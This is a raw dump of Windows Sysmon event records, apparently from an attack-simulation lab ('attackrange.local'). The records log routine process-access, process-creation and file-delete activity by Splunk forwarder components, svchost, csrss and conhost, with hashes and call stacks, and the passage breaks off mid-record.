07:54:52.957{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.957{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.957{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.957{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.957{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F54C-60EB-517D-00000000CF01}8784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.957{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F54C-60EB-517D-00000000CF01}8784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.958{466BC892-F54C-60EB-517D-00000000CF01}8784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.603{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B83D4A005D9B20FF2375DC865001B450,SHA256=31D6F38DC7FF644EE687F21D6C58CAA632F168D4E83F3E3A9B308915A25D04A2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.304{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F54C-60EB-507D-00000000CF01}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.304{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.304{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.304{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F54C-60EB-507D-00000000CF01}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.304{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.304{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.304{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F54C-60EB-507D-00000000CF01}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.290{466BC892-F54C-60EB-507D-00000000CF01}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.273{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=468A1C4228B0CC1632B06725C1A605C6,SHA256=198D9F71F4B356CE79D19DFB6D4E5AECEE854A72EFD70C28092D346AD2ED79FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808031Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:53.852{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FABAB0E86B11861582684DC3646271C5,SHA256=61CC6BD066FFFA347844E4F23A98E2B4080ACAACAFD132EE6ACD6536A09EDF71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.964{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DB70BE0A96FFE00B18A0CDD0894E1FD0,SHA256=DD1AD2417AB8C8DF518FD76FCE7A2FB6DDF64DB03C6720663E31FB44F605097C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.641{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F54D-60EB-527D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.641{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F54D-60EB-527D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.641{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.641{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.641{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F54D-60EB-527D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.641{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.641{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.620{466BC892-F54D-60EB-527D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.273{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E63263A344D14B617F26506AA77BB74,SHA256=9309364C5A34AA6BA54B9C7A6EC507EDCFA6128F00E3D436B4B161B0593C24A2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.204{466BC892-F54C-60EB-517D-00000000CF01}87844728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000808032Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:54.882{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF9BD60DBD301A46EDFEF9BCE4206E5A,SHA256=D0C26919DE226120631E1411DB09060CEB94964858944EF74B6347B9D2A0AAAD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.508{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F54E-60EB-537D-00000000CF01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 